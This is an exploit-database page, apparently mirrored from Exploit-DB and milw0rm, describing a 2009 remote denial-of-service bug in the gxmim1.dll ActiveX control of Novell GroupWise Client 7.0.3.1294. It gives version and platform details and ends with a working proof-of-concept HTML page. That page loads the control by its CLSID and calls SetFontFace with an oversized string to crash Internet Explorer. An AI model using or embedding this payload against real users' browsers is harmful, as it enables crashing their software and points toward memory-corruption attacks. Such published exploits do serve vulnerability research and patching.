header-logo
Suggest Exploit
vendor:
Groupwise Client
by:
Francis Provencher
7.8
CVSS
HIGH
Remote DoS
20
CWE
Product Name: Groupwise Client
Affected Version From: 7.0.3.1294
Affected Version To: 7.0.3.1294
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional French SP2 and SP3
2009

Novell Groupwise Client 7.0.3.1294 Remote DoS

GroupWise is a messaging and collaborative software platform from Novell that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, Netware, and Linux. The latest generation of the platform is GroupWise 8, which was launched in 2008. A proof of concept DoS code was released which exploited a vulnerability in the gxmim1.dll file of version 7.0.3.1294 of the GroupWise Client on Windows XP Professional French SP2 and SP3.

Mitigation:

N/A
Source

Exploit-DB raw data:

#####################################################################################

Application:  Novell Groupwise Client 7.0.3.1294
            
Platforms:    Windows XP Professional French SP2 and SP3

crash:	      IE 6.0.2900.2180
	
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

GroupWise is a messaging and collaborative software platform from Novell that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, Netware, and Linux. The latest generation of the platform is GroupWise 8, which was launched in 2008.

#####################################################################################

============================
2) Technical details 
============================

Name:	gxmim1.dll
Ver.:	7.0.3.1294
CLSID:	{9796BED2-C1CF-11D2-9384-0008C7396667}




#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667' id='GWComposeCtl'></object>


<script language='vbscript'>




argCount   = 1


arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

GWComposeCtl.SetFontFace arg1

</script>




#####################################################################################

# milw0rm.com [2009-09-15]